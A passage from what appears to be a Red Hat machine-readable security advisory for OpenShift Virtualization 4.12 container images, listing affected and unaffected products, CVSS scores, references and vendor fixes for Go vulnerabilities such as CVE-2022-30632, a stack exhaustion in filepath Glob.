"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: compress/gzip: stack exhaustion in Reader.Read", }, { cve: "CVE-2022-30632", cwe: { id: "CWE-1325", name: "Improperly Controlled Sequential Memory Allocation", }, discovery_date: "2022-07-14T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2107386", }, ], notes: [ { category: "description", text: "A flaw was found in golang. Calling Glob on a path that contains a large number of path separators can cause a panic issue due to stack exhaustion. This can cause an attacker to impact availability.", title: "Vulnerability description", }, { category: "summary", text: "golang: path/filepath: stack exhaustion in Glob", title: "Vulnerability summary", }, { category: "other", text: "The exploitation of this flaw will only result in a denial of service of the application via the application crashing which is why this has been rated as moderate.\n\nWithin regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-1325: Improperly Controlled Sequential Memory Allocation vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nAccess to the platform is granted only after successful hard token-based multi-factor authentication (MFA) and is governed by least privilege to ensure only authorized users and roles can execute or modify code. Static code analysis and peer reviews enforce strong input validation and error handling, preventing improperly validated inputs from causing system instability, data exposure, or privilege escalation. In the event of successful exploitation, process isolation limits the impact of excessive sequential memory allocation by restricting memory use per process, preventing any single process from exhausting system resources. Finally, the platform uses memory protection mechanisms such as Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR) to reduce the risk of memory allocation-based attacks.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-30632", }, { category: "external", summary: "RHBZ#2107386", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-30632", url: "https://www.cve.org/CVERecord?id=CVE-2022-30632", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-30632", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-30632", }, { category: "external", summary: "https://go.dev/issue/53416", url: "https://go.dev/issue/53416", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", url: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", }, ], release_date: "2022-07-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: path/filepath: stack exhaustion in Glob", }, { cve: "CVE-2022-30633", cwe: { id: "CWE-1325", name: "Improperly Controlled Sequential Memory Allocation", }, discovery_date: "2022-07-14T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", 